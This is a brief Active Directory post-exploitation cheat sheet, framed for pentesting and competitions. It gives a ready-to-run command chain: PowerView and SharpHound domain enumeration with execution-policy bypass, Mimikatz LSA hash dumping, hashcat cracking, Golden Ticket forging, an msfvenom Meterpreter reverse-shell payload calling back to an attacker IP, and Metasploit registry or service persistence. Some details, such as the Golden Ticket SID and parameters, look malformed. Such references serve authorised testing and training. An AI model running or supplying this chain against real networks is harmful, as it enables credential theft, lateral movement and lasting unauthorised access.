After getting the foot in the door in a pentesting scenario or competition it is time for gathering more data and credentials and creating persistence:
- PowerView – Enumerating the domain.
- SharpHound – Hammering that DC to extract all available data.
- BloodHound – Analysing the extracted data from the domain.
- Mimikatz – Dumping hashes.
- Hashcat – Cracking the dumped hashes.
- Golden Ticket – Getting access to other machines.
- Msfvenom – Crafting a payload.
- Metasploit – Getting the reverse shell and creating persistence.
Enumerating the domain with the PowerShell script PowerView – Full command list available at [Link]:
cmd powershell -ep bypass . .\PATH\PowerView.ps1
Enumerate Domain Users
Get-NetUser | select cn
Enumerate Computers
Get-NetComputer -fulldata | select operatingsystem
Enumerate Groups
Get-NetGroup -GroupName *admin*
Enumerate Shares
Invoke-ShareFinder
Extract the loot from any computer joined to the domain with SharpHound script:
powershell -ep bypass . .\PATH\SharpHound.ps1 Invoke-Bloodhound -CollectionMethod All -Domain DOMAIN.local -ZipFileName loot.zip
Copy the file over to the attacker’s machine.
Explore the domain with BloodHound. Neo4j is just the database used by BloodHound.
Installing the tool on the attacker machine:
sudo apt install bloodhound neo4j -y sudo neo4j console
The default credentials for the database are neo4j:neo4j. Navigate to http://localhost:7474/ and change the default password.
Then execute the BloodHound application:
bloodhound
Click on the import button or simply drag and drop the .zip file.
On the left menu, look for Queries / Analysis.
Dumping hashes with Mimikatz:
mimikatz.exe privilege::debug lsadump::lsa /patch
Chacking the dumped hashes with HashCat:
hashcat -m 1000 hashes.lst /usr/share/wordlists/rockyou.txt
Creating a Golden Ticket with Mimikatz:
lsadump::lsa /inject /name:userName kerberos::golden /user:administrator /domain:domain.local /sid:S-3-5-41-845420856-2351964987-986696098 /userName:5508500012cc005cf7082a9a89ebdfdf /id:500 misc::cmd
Getting access to other machines with the Golden Ticket on the newly open window:
dir \\ComputerA\c$
CREATING PERSISTENCE
Crafting a payload with Msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.99 LPORT=4444 -f exe -o shell.exe
On the attacker side start a listener with Metasploit – Module Library available at [Link]:
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp run background
Applying persistence to the granted session with Persistent Registry Startup Payload Installer:
use exploit/windows/local/persistence sessions set session 1
See also exploit/windows/local/persistence_service for Persistent Service Installer.